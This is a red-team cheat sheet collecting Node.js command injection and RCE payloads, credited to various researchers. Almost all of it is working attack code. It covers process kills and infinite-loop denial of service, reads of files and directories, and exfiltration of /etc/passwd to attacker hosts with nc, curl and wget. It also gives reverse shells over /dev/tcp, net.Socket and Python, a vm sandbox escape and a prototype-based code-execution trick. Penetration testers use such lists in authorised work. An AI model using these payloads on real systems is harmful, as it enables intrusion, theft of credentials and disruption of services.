# NodeJS Red Team Cheat Sheet

A curated list of NodeJs Command Injection / RCE Payloads.

## Know the evil functions

`eval()`, `setTimeout()`, `setInterval()`, `Function()`, `unserialize()`

## Know your weapons

`fs`, `child_process`, `net`, `http`

- `spawn` returns streams: use it when the child produces a large (or binary) amount of data for Node to consume.
- `exec` returns a buffer: use it when you only need the exit status or a small amount of output.

## Attack Vectors

### Denial of Service

```js
while(1)
```

### Exit the running process

```js
process.exit()
```

### Kill process

```js
process.kill(process.pid)
```

### Read current working directory

```js
res.end(require('fs').readdirSync('.').toString())
```

### Read parent directory

```js
res.end(require('fs').readdirSync('..').toString())
```

### Read file

```js
res.end(require('fs').readFileSync(fname))
```

### Spawn magic (by @aaditya_purani)

```js
require('child_process').spawn('ls',['-a']).stdout.on('data', function (data) {console.log('own'+ data); });
```

### Child exec (by @artsploit)

```js
require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
require('child_process').exec('bash+-c+"bash+-i+>%26+/dev/tcp/nc_host/nc_port+0>%261"')
require('child_process').exec('curl+-F+"x=`cat+/etc/passwd`"+attackersip.com')
```

### Wget post data (by @brutelogic)

```js
require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')
```

### Using net (by ibreak.software)

```js
var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
```

### Using arguments[1] as response object (by @OrhanAlbay)

```js
arguments[1].end(require('child_process').execSync('whoami'))
arguments[1].end(require('child_process').execSync('cat /etc/passwd'))
```

### Bypass stream limits by compressing to gzip (by @aaditya_purani)

```js
const pwn=require('zlib').createGzip();const inx=require('fs').createReadStream('app.json');const oux = require('fs').createWriteStream('unrestrictive.gz');inx.pipe(pwn).pipe(oux)
```

### Sandbox bypass with spawnSync (by netspi)

```js
var resp = spawnSync('python',
['-c',
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
]
);
print(resp.stdout);
print(resp.stderr);
```

### vm module breakout (by pwnisher)

```js
"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);
```

### Alternative RCE payload (by mahmoud)

```js
x = ''
myToString = x.toString.bind("console.log(process.env)")
myToStringArr = Array(myToString)
myToStringDescriptor = Object.getOwnPropertyDescriptor(myToStringArr, 0)
Object.defineProperty(Object.prototype, "toString", myToStringDescriptor)
Object.constructor("test", this)()
```

## Need more?

The repository will be maintained from time to time. Feel free to contribute.

## Contact

@aaditya_purani